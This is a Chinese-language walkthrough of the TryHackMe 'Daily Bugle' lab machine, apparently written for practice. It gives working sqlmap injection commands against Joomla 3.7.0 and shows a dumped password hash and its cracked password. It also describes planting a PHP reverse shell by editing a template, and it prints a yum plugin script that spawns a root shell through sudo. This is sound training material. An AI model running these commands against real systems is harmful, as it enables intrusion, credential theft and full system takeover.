THM-Daily Bugle

靶机ip：10.10.158.159

信息收集

nmap扫描

nmap --min-rate 10000 -p- -sV -sC 10.10.158.159 -oN reports/nmap

发现有22，80，3306端口开放，并且在80端口上有robots.txt，开启了mysql服务

80端口

页面貌似没什么信息，扫描一下目录

gobuster dir -u http://10.10.158.159/ -w /usr/share/wordlists/dirb/common.txt

先看下robots.txt

综上来看这是一个joomla CMS，目录访问后并没有发现什么信息

SQL漏洞利用

使用joomscan测试一下

joomscan -u http://10.10.158.159/

发现版本是3.7.0，搜索一下是否有可以利用的漏洞

searchsploit joomla 3.7.0

发现在该版本存在sql注入，将文件复制下来查看

这里写了使用sqlmap工具进行sql注入，直接照着弄就行

sqlmap -u "http://10.10.158.159/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

利用成功，得到数据库，继续爆破表

sqlmap -u "http://10.10.158.159/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomla --tables -p list[fullordering]

得到很多表，我们重点看users表，先查看字段的值

sqlmap -u "http://10.10.158.159/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomla -T '#__users' --columns -p list[fullordering]

选项直接正常选就行

漫长等待后也是把字段爆破出来了，我们重点看用户名和密码

sqlmap -u "http://10.10.158.159/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomla -T '#__users' -C username,password --dump -p list[fullordering]

成功拿到了一组凭据

jonah : $2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm

密码是加密数据，这里使用john破解，先将密码保存至hash

john hash --wordlist=/usr/share/wordlists/rockyou.txt

得到jonah用户的明文密码spiderman123

登录joomla

登陆成功

获得初始权限

查看后发现可以通过改写模板文件的内容getshell

首先点击右侧Template

再点击右侧的Template

选第一个Beez3

为了方便反弹shell，直接修改index.php文件

将php-reverse-shell.php写到文件中，并修改其中的ip和port

保存，在kali中起个监听

在页面中访问刚才修改的文件

http://10.10.158.159/templates/beez3/index.php

getshell成功！

现在只有一个初始访问权限，还需要横向移动到jjameson用户

提升至user权限

先查看文件

在查看文件的时候发现在 /var/www/html目录下有个configuration.php文件，查看一下

发现有密码nv5uz9r3ZEDzVjNu，貌似是root用户的，ssh登录一下

看样子不是root的密码，尝试ssh登陆jjameson

登陆成功

直接在当前页面找到user.txt

提升至root权限

先执行sudo -l看看是否有可利用的

可以使用yum提权

TF=$(mktemp -d)
cat >$TF/x<<EOF
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF

cat >$TF/y.conf<<EOF
[main]
enabled=1
EOF

cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
  os.execl('/bin/sh','/bin/sh')
EOF

sudo yum -c $TF/x --enableplugin=y

提权成功

在/root目录下找到root.txt